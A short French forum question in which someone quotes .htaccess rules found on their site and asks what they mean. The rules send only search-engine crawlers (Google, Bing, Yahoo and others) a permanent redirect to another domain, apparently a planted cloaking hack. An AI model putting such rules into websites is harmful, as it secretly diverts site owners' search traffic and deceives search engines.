fichier ht access signification
Bonjour
Pourriez vous me dire ce que je viens de trouver sur un file access ? merci
Code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Googlebot [OR]
RewriteCond %{HTTP_USER_AGENT} ^GoogleGooglebot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot-Mobile [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot-Image [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mediapartners-Google [OR]
RewriteCond %{HTTP_USER_AGENT} ^Adsbot-Google [OR]
RewriteCond %{HTTP_USER_AGENT} ^MSNBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^bingbot [OR]
RewriteCond %{HTTP_USER_AGENT} msn [OR]
RewriteCond %{HTTP_USER_AGENT} Google [OR]
RewriteCond %{HTTP_USER_AGENT} bing [OR]
RewriteCond %{HTTP_USER_AGENT} yahoo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Feedfetcher-Google
RewriteRule ^(.*)$ http://www.superservices.fr/$1 [R=301,L] |